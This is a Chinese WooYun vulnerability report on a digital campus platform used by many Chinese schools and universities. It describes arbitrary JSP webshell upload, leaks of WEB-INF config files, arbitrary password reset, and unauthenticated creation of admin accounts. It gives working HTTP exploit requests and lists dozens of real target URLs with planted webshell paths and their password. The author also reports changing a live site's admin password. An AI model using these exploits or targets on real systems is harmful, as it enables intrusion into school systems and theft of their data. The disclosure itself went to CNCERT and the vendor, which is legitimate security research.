当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103605

漏洞标题:某数字校园平台通用型漏洞打包

相关厂商:北京师科阳光信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-03-26 10:37

修复时间:2015-06-24 15:28

公开时间:2015-06-24 15:28

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

以下问题和版本有关
1#前台任意文件上传
2#默认配置不当,导致信息泄漏
3#任意用户密码重置
4#前台新增管理员

详细说明:

北京师科阳光信息技术有限公司是一家专业从事教育技术服务的软件企业、中关村高新技术企业,2011年1月公司被评为国家高新技术企业。公司成立于2004年,注册资金420万元。公司长期致力于“如何利用技术提高学习效率”的研发,在学习支持、知识服务领域拥有深厚的积累。公司拥有14项软件著作权,7个软件产品登记证书,2件商标权,一项发明专利。客户遍及十几个省市、自治区,包括中国教育电视台、高等教育出版社、北京师范大学、各级各类学校以及教育局等。
百度关键字:

技术支持:北京师科阳光信息技术有限公司


下面以官网为例:http://www.edutech.com.cn
1#前台任意文件上传

上传点:http://*/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod


http://www.edutech.com.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod

QQ截图20150324210713.png


上传之后文件路径可以参考站点文章内容里的图片路径
http://www.edutech.com.cn/cms/uploaddir/product/4d697d9967ee9354a2941ffcb0351636.jpg
这里要注意路径product与上传时传递的参数savepath=user有关,即http://www.edutech.com.cn/cms/uploaddir/*savepath的值/返回的值

QQ截图20150324210846.png


比如上图的15c030fe752c02accd6b99de3e74c564.jpg,最后路径就是
http://www.edutech.com.cn/cms/uploaddir/user/15c030fe752c02accd6b99de3e74c564.jpg

QQ截图20150324213618.png


在上传的时候直接将文件后缀改为.jsp即可上传shell

QQ截图20150324213826.png


通过对参数filename的控制,可以自定义文件名,我"method=uploadimagedeal&savepath=user&filename=wooyun&sketch=vod&datepath="

QQ截图20150324214101.png


也可以利用截断上传%00

QQ截图20150324214234.png


QQ截图20150324214241.png


当然也可以跨目录

QQ截图20150324214424.png


QQ截图20150324214241.png


QQ截图20150324214554.png


QQ截图20150324214524.png


以下案例供重现:
http://fe.bnu.edu.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod
http://fe.bnu.edu.cn/upload_dir/1/news/201503/c5c4ab8718bf4e770d1e6cae35546b41.jsp 密码sqzr
http://www.wkmk.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod
这个站有做过处理的样子,上传点存在,但jsp和jspx访问报500错误
http://wlkc.jtdx.com.cn//sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod
有的时候上传找不到路径,要猜一下,看一下关联的几个站点的图片路径(确定upload_dir)
http://wlkc.jtdx.com.cn/upload_dir/user/2015-03-25/668763c8d469d704b2e1d9926061ae15.jsp 密码sqzr

QQ截图20150325092952.png


QQ截图20150325093226.png


这仅仅是个开始,这套数字校园平台系统好像有几个版本,在另一套版本里,上传点如下:(一样的抓包,改后缀名,一样的可以跨目录,自定义名称)
http://www.cea.bnu.edu.cn/imageUploadAction.fo?method=upload&savepath=user&pathtype=ID
http://www.cea.bnu.edu.cn/upload_dir/1/user/201503/70659ee17f7536d06c3462ecec44425e.jsp (密码sqzr)

QQ截图20150325101404.png


http://zbzx.chpedu.net/imageUploadAction.fo?method=upload&savepath=user&pathtype=ID
http://zbzx.chpedu.net/upload_dir/1/user/201503/6f1757d186da2f68102af98be007d35f.jsp (密码sqzr)

QQ截图20150325101652.png


QQ截图20150325101932.png


以下案例供重现:
http://www.cma-china.com.cn//imageUploadAction.fo?method=upload&savepath=user&pathtype=ID
http://pdn.cea.bnu.edu.cn/imageUploadAction.fo?method=upload&savepath=user&pathtype=ID
接下来的百度中又发现了一套版本,上传点在这http://*/fileUploadAction.do,这里要利用POST数据包

POST http://*/fileUploadAction.do?ftag=networkfile&unitid=18 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------ei4KM7Ij5ae0Ij5Ef1GI3KM7ei4Ij5
User-Agent: Shockwave Flash
Host: 注意替换
Content-Length: 19941
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
------------ei4KM7Ij5ae0Ij5Ef1GI3KM7ei4Ij5
Content-Disposition: form-data; name="Filename"
160_default.jpg
------------ei4KM7Ij5ae0Ij5Ef1GI3KM7ei4Ij5
Content-Disposition: form-data; name="Filedata"; filename="160_default.jsp"
Content-Type: application/octet-stream
wooyun test
------------ei4KM7Ij5ae0Ij5Ef1GI3KM7ei4Ij5
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4KM7Ij5ae0Ij5Ef1GI3KM7ei4Ij5--


http://www.ljxes.com/fileUploadAction.do

QQ截图20150325102530.png


QQ截图20150325102549.png


http://zy.chpedu.net//fileUploadAction.do

QQ截图20150325102656.png


QQ截图20150325102718.png


以下案例供重现:
http://www.tj.shyedu.cn//fileUploadAction.do
http://pdn.cea.bnu.edu.cn//fileUploadAction.do
http://zy.jtdx.com.cn//fileUploadAction.do
http://www.wkmk.cn/fileUploadAction.do

漏洞证明:

一句话地址:
http://www.edutech.com.cn/cms/uploaddir/user/wooyun2.jsp
密码sqzr

QQ截图20150324215133.png


数据库我就不看了....
2#默认配置不当,导致信息泄漏
http://www.edutech.com.cn/WEB-INF/web.xml

QQ截图20150324215227.png


http://www.edutech.com.cn/WEB-INF/uisk/struts/struts-config.xml

QQ截图20150324215305.png


以下案例供重现:
http://fe.bnu.edu.cn/WEB-INF/web.xml
http://www.shsbnu.net/WEB-INF/web.xml
http://www.cea.bnu.edu.cn/WEB-INF/web.xml
http://www.xueke.syn.cn/WEB-INF/web.xml
http://zbzx.chpedu.net//WEB-INF/web.xml
http://www.jzdszx.com//WEB-INF/web.xml
http://www.ljxes.com//WEB-INF/web.xml
3#任意用户密码重置(还是和版本有关,某个版本的平台)
问题出在忘记密码的第四步,抓包,这里没有验证前面3步的忘记密码问题,造成了问题的产生
以http://www.ljxes.com/getpwd.do?method=getpwd4为例,我通过注册页面http://www.ljxes.com/register.do?method=br&unitid=18,注册了一个用户kakaxi
这时候点忘记密码

QQ截图20150325103910.png


QQ截图20150325103934.png


QQ截图20150325103954.png


QQ截图20150325104003.png


记得抓包

QQ截图20150325104028.png


POST http://www.ljxes.com/getpwd.do?method=getpwd4 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.ljxes.com/getpwd.do?method=getpwd3
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.ljxes.com
Content-Length: 53
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
password=123456&passwordagain=123456&loginname=kakaxi


也就是说通过控制loginname可以修改任意用户密码
这里我把admin密码改成了wooyun

QQ截图20150325104316.png


QQ截图20150325104358.png


我要向该站管理员道歉,我密码我改不回去了....一定原谅我
以下案例供重现:
http://zy.jtdx.com.cn/getpwd.do?method=getpwd4
http://www.jzdszx.com//getpwd.do?method=getpwd4
http://www.wkmk.cn/getpwd.do?method=getpwd4
http://zxbk.ysqjex.com//getpwd.do?method=getpwd4
http://zy.chpedu.net//getpwd.do?method=getpwd4
http://www.tj.shyedu.cn//getpwd.do?method=getpwd4
4#前台新增管理员
http://www.ljxes.com/initSite.do?method=addUser

QQ截图20150325104718.png


QQ截图20150325104748.png


第一个图忘了截,就是建了个帐号是wooyun,密码是123456的某科管理员
登录下

QQ截图20150325104902.png


QQ截图20150325104924.png


然后就可以为所欲为了,改管理密码不在话下

QQ截图20150325105030.png


时间有限,没一一去找:
http://www.cea.bnu.edu.cn/initSite.do?method=addUser
http://www.jzdszx.com/initSite.do?method=addUser
http://zy.jtdx.com.cn/initSite.do?method=addUser
挺多学校中招,提交这么多,我能上首页咪~

修复方案:

1.上传点过滤
2.修改配置
3.权限控制
4.忘记密码第四步加上密码问题的验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-03-26 15:26

厂商回复:

CNVD确认所述情况,已转由CNCERT向赛尔教育等单位通报

最新状态:

暂无